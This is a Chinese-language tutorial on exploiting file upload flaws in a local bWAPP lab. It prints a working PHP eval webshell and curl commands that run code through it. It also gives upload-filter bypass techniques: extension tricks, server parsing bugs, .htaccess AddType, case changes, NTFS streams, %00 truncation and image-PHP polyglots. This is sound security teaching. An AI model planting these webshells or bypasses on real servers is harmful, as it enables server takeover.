《web安全攻防实战》——文件上传漏洞之基础篇
1、漏洞原理:Webshell
webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限。
webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。
关键函数:以php为例,eval(),执行用户输入的函数。
2、一句话木马
(1)登录本地的容器账户后,选择未经严格审计的文件上传功能
安全级别选择low,是一个比较低的安全级别,点击 hack。
(2)编辑木马文件并上传-PHP
<?php @eval($_POST['hacker']); ?> #取得post,hacker字段里的值,然后将这个值转换成php代码去执行
点击here,可以看到一句话木马文件已经上传到了下图的路径中。
(3)让Webshell执行命令
curl -d "hacker=echo get_current_user();" http://127.0.0.1/images/shell.php
curl -d "hacker=echo getcwd();" http://127.0.0.1/images/shell.php
此处介绍两个php api
get_current_user():获取服务所属用户名
getcwd():获取当前执行目录
操作见下图,服务器成功返回了用户名www-data及当前执行目录/app/images
3、文件后缀名绕过
将文件上传等级设置为 medium,上传文件后缀为php时,显示被拦截
*将后缀名php改为php3成功绕过,改为php30却失败了,上传shell.php30文件,服务器将文件当作txt文本进行了处理,直接打印了文件内容 *
(1)调试docker
docker container list -a #查看已经启动的docker容器
docker exec -it [id] bash #调试
(2)查看web服务器
netstat -antp | grep 80 #通过查看网络连接寻找正在托管web服务的主要服务器
bwapp使用的web server是apache2,通过配置文件可以了解到apach2e的语言解析模块文件路径 /etc/apache2/
(3)查看配置文件
cd etc/apache2/
vim apache2.conf
(4)查看语言解析模块配置文件
cd mods-enabled/
vim /etc/apache2/mods-enabled/php5.conf
通过配置文件可发现,php、php3、php5、phptml等文件后缀都可以被apache服务器解析,这也就是为什么刚刚上传的php3文件可被执行,php30不能被执行的原因。
4、web服务器关联型漏洞
4.1 IIS 5.x / 6.0 解析漏洞
漏洞1:当创建.asp的文件目录的时候,在此目录下的任意文件,服务器都解析为asp文件
漏洞2:服务器默认不解析“;”以后的内容
漏洞利用形式:
漏洞1:www.xxx.com/xx.asp/xx.jpg 会被解析成asp文件
漏洞2:www.xxx.com/xx.asp;.jpg 会被解析成为asp文件
4.2 Nginx 解析漏洞
在低版本Nginx中存在一个由PHP-CGI导致的文件解析漏洞。
PHP的配置文件中有一个关键的选项cgi.fix_pathinfo在本机中位于php.ini配置文件中,
默认是开启的。
当URL中有不存在的文件时,PHP就会默认向前解析。
漏洞利用流程:
- 访问:www.xx.com/phpinfo.jpg/1.php (1.php不存在)
- 会解析phpinfo.jpg文件,但是按照php格式解析
4.3 Apache 解析漏洞
Apache 在1.x和2.x版本中存在解析漏洞:
Apache从右至左开始判断后缀,跳过非可识别后缀,直到找到可识别后缀为止,
然后将该可识别后缀进解析。
漏洞利用流程:
- 上传shell.php.test;
- 访问shell.php.test,服务器会解析shell.php.test文件,但是按照php文件格式进行解析。
5、前端验证绕过
很多网站、CMS 都有使用,只在前端利用 JavaScript 来做校验。
漏洞利用流程(两种方法都可以):
- 通过Burp Suite抓包,然后修改内容后放行。
- 通过Chrome检查代码,禁止/删除JavaScript代码。
6、htaccess绕过
什么是.htaccess?
.htaccess文件(分布式配置文件)提供了一种方式,使得配置文件可以随文件夹不同而不同,其所放置的文件夹及所有子文件夹都会受此影响,其语法同apache主配置文件。
如何利用.htaccess?
场景:启用了.htaccess文件的网站,使用此文件类型来绕过限制较全面的***黑名单***过滤。
- 上传一个.htaccess文件,文件内容设置为【AddType application/x-httpd-php .test】。
- 上传一句话木马文件,文件名设置为shell.test。
- 在浏览器中访问shell.test即可执行一句话木马。
7、大小写绕过-操作系统相关
这是一种比较简单的绕过方式,同样针对***黑名单***。
如果我们想上传一个php木马,那么我们可以上传一个pHp即可。
windows平台大小写不敏感,LINUX系统大小写敏感,但是可以手工操作不敏感
8、Windows 文件流特性绕过
什么是Windows文件流?
NTFS文件系统实现了多文件流特性,NTFS环境一个文件默认使用的是未命名的文件流,同时可创建其他命名
的文件流,Windows资源管理器默认不显示出文件的命名文件流,这些命名的文件流在功能上和默认使用的
未命名文件流一致,甚至可以用来启动程序。
我们来用Windows平台做一些测试:
- Echo 111 > test.txt:111.txt;
- Echo test > test.txt;
- Echo 222 > test.txt::$data;
9、 %00截断绕过-编码绕过
可以看到黑名单会存在巨大的被绕过的风险,无论是服务器原因还是操作系统原因,那么白名单是否完全安全呢?
可以看出代码采用的白名单校验,只允许上传图片格式,理论上这个上传是不好绕过的。但是后面采用保存文件的时候,是路径拼接的形式,而路径又是从前端获取,所以我们可以采用在路径上截断。
- 设置save_path=…/upload/a.php%00 #%00 是在字符串中或者文件数据流中的结尾符,URL编码的结尾符就是%00
- 上传一个内容为一句话木马的jpg文件
(1)将shell.php改为shell.php.jpg
(2)打开burpsuit,拦截请求
(3)将shell.php.jpg改为 shell.png .jpg
截断方式可以生效的原因是我们可以分别控制存储路径和文件名称,这样才可以通过文件名称校验的同时存储为php文件。
(4)进入16进制
无法通过文件输入法打出截断符,可以通过改变16进制编码,改为截断符的编码
将20改为00
(5)关闭burp拦截
文件上传的地址变成了shell.png,变成了我们想要的文件类型
10、文件头检测绕过-文件内容检测
常见的文件头格式
以php语言为例,首先准备一个普通的png格式文件:
再准备一个用于测试的php文件,功能是输出‘test’字符串:
<?php echo 'test'; ?> #打印出test说明代码被成功执行了
将php文件内容追加到png文件内。
利用php,解析png文件,php代码被成功执行,说明我们可以通过把图片和代码进行聚合的方式,让它既满足文件头的标准校验,又满足代码的执行。